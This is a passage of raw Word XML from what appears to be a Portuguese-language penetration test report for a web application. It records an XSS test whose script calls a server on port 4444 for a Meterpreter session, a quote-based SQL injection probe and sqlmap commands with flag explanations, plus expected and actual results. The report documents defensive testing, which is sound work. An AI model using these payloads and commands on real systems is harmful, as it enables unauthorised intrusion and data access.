          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t e tenta realizar uma chamada A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jax do tipo GET para</w:t>
      </w:r>
      <w:r w:rsidR="006E2559" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r w:rsidR="00881DA5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP_do</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00881DA5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>servidor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na porta 4444, de forma síncrona.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00881DA5" w:rsidRPr="00F15F82" w:rsidRDefault="00881DA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E31790" w:rsidRDefault="008C6DC7" w:rsidP="00E31790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E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E31790" w:rsidRDefault="008C6DC7" w:rsidP="00E31790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E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">r = new XMLHttpRequest(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E31790" w:rsidRDefault="008C6DC7" w:rsidP="00E31790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E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r.open("GET",’http://IP_do_servidor:4444’,false);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E31790" w:rsidRDefault="008C6DC7" w:rsidP="00E31790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E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>r.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00E31790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1790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31790" w:rsidRDefault="00E31790" w:rsidP="00E31790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31790" w:rsidRPr="00F15F82" w:rsidRDefault="00E31790" w:rsidP="00E31790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E31790" w:rsidRPr="00F15F82" w:rsidRDefault="00E31790" w:rsidP="00E31790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O esperado é que a aplicação realize tratamento para impedir o código de ser executado.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31790" w:rsidRDefault="005967D5" w:rsidP="00E31790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F15F82" w:rsidRDefault="00D76012" w:rsidP="00E31790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O sistema </w:t>
      </w:r>
      <w:r w:rsidR="00557D26" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">não </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>passou nos teste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. Independente da sessão do Meterpreter não ser aberta, o código conseguiu ser inserido e executado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00F15F82" w:rsidRDefault="00751591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E317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E31790">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.3.3.3</w:t>
      </w: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Tela C</w:t>
      </w:r>
      <w:r w:rsidR="0049098B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">adastro Lotes </w:t>
      </w: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– Exploração via SQL Injection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Tarefa realizada dia 24/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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: 1 hora e 22 minutos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Tentar realizar consultas não autorizadas no banco de dados por meio da injeção de SQL nos cam</w:t>
      </w:r>
      <w:r w:rsidR="0049098B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pos da tela de Cadastro Lotes</w:t>
      </w:r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1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C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0049098B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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Descobrir se o campo Marca/Fabricante é vulnerável a SQL Injection através das aspas simples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9B1DC9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Comando</w:t>
      </w:r>
      <w:r w:rsidR="0049098B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado</w:t>
      </w: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: 1 ‘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49098B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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O uso de aspas simples aqui é o teste mais básico de vulnerabilidade de um campo para SQL Injection. Imagina-se que haja por baixo uma instrução SQL que possua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where param1 = &lt;parametro_na_interface&gt; and …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49098B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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Caso a aplicação não fizesse o devido tratamento do comando inserido e a instrução fosse ser modificada para </w:t>
      </w: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where param1  = 1 ‘ . </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O que ocasionaria um erro de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="00D46C6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46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="00D46C6B" w:rsidP="0049098B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</w:t>
      </w:r>
      <w:r w:rsidR="003F0DBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D46C6B" w:rsidRPr="00F15F82" w:rsidRDefault="00D46C6B" w:rsidP="0049098B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spera-se que a aplicação realize o tratamento dos caracteres para impedir que sejam interpretados como</w:t>
      </w:r>
      <w:r w:rsidR="006C08DA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> trecho da consulta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098B" w:rsidRDefault="005967D5" w:rsidP="0049098B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F15F82" w:rsidRDefault="00D76012" w:rsidP="0049098B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.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Colocando 1‘ no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campo </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Marca/Fabricante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o cadastro aconteceu normalmente. Isso indica que a aplicação está fazendo um tratamento adequado para os dados de entrada e por isso o campo não é vulnerável.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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098B" w:rsidRPr="00F15F82" w:rsidRDefault="0049098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2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D918FF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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Usar a fe</w:t>
      </w:r>
      <w:r w:rsidR="00C52795">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rramenta Sqlmap para realizar </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>teste</w:t>
      </w:r>
      <w:r w:rsidR="00C52795">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s de injeção de SQL na página Cadastro Lotes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00C52795" w:rsidP="00D918FF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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ravés da ferramenta Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, capturar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a requisição POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realizada para o acesso à página em questão e salvar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em um arquivo a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lastRenderedPageBreak/>
        <w:t xml:space="preserve">parte para </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">que esses dados possam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ser utilizado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pelo Sqlmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>posteriormente. [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2]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FB2992">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1418"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="851" w:firstLine="56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Comando utilizado: sqlmap -r params -p --current-db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71369" w:rsidRDefault="00771369" w:rsidP="00D918FF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141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sqlmap” executa a ferramenta Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00D918FF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1418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comando “-r” informa que as instruções do ataque devem ser carregadas no arquivo params.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00C52795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1418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“-p” indica o parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00510DD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a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ser injetado</w:t>
      </w:r>
      <w:r w:rsidR="007E2011">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pelo Sqlmap</w:t>
      </w:r>
      <w:r w:rsidR="00C52795">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, que nesse caso corresponde</w:t>
      </w:r>
      <w:r w:rsidR="00FD3807">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00C306C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> um</w:t>
      </w:r>
      <w:r w:rsidR="00FD3807">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parâmetro de entrada de dados </w:t>
      </w:r>
      <w:r w:rsidR="00C306C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizado pela</w:t>
      </w:r>
      <w:r w:rsidR="00FD3807">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tela</w:t>
      </w:r>
      <w:r w:rsidR="00C306C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> explorada</w:t>
      </w:r>
      <w:r w:rsidR="00C52795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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00D918FF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1418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“--current-db” solicita que o Sqlmap que tente descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD" w:rsidRPr="00F15F82" w:rsidRDefault="00190AAD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90AAD" w:rsidRPr="00F15F82" w:rsidRDefault="00190AAD" w:rsidP="009F7A3C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F0DBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD" w:rsidRPr="00F15F82" w:rsidRDefault="00190AAD" w:rsidP="009F7A3C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spera-se que a aplicação faça o tratamento do</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s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parâmetro</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003F0DBB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, não permitindo que eles sejam vulneráveis à injeção de SQL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B2992" w:rsidRDefault="005967D5" w:rsidP="009F7A3C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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="009F7A3C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Erro na ferramenta. </w:t>
      </w:r>
      <w:r w:rsidR="00FD3807">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro não foi indicado corretamente no comando utilizado. Dessa forma, o </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sqlmap não reconhece</w:t>
      </w:r>
      <w:r w:rsidR="00FD3807">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u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o parâmetro, que está no arquivo indicado no comando.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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771369" w:rsidRPr="00F15F82" w:rsidRDefault="0077136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 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00F02825">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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Alterar o comando utilizado na </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 para </w:t>
      </w:r>
      <w:r w:rsidR="00C306C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>indicar corretamente</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00C306C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a ser testado pelo Sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00771369">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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O comando do Sqlmap pede que seja informado um parâmetro para possível injeção de SQL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F02825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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comando utilizado: sqlmap -r params -p descricao --current-db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02825" w:rsidRDefault="00F02825" w:rsidP="00F02825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1843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qlmap” executa a ferramenta Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00F02825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1843" w:hanging="360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O comando “-r” indica ao programa que as instruções do ataque devem ser carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00F02825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1843" w:hanging="360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“-p” indica o parâmetro que deve ser injetado</w:t>
      </w:r>
      <w:r w:rsidR="007E2011">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00510DD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pelo Sqlmap, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00F02825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1843" w:hanging="360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“descrição” é o parâmetro que sofrerá </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de injeção.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00F02825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1843" w:hanging="360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“--current-db” comando utilizado para descobrir qual o banco da aplicação alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD" w:rsidRDefault="00190AAD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4228B" w:rsidRPr="00F15F82" w:rsidRDefault="0094228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87AAF" w:rsidRPr="00F15F82" w:rsidRDefault="00190AAD" w:rsidP="00F87AAF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lastRenderedPageBreak/>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidR="00F87AAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101063" w:rsidRPr="00F15F82" w:rsidRDefault="00190AAD" w:rsidP="00F87AAF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Espera-se que a aplicação faça o tratamento do parâmetro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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“descricao”</w:t>
      </w:r>
      <w:r w:rsidR="0094228B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, não permitindo que ele seja vulnerável à injeção de SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094228B" w:rsidRPr="00F15F82" w:rsidRDefault="0094228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87AAF" w:rsidRDefault="005967D5" w:rsidP="00F87AAF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708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Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00D76012" w:rsidP="00F87AAF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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Cs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> O</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00707948" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
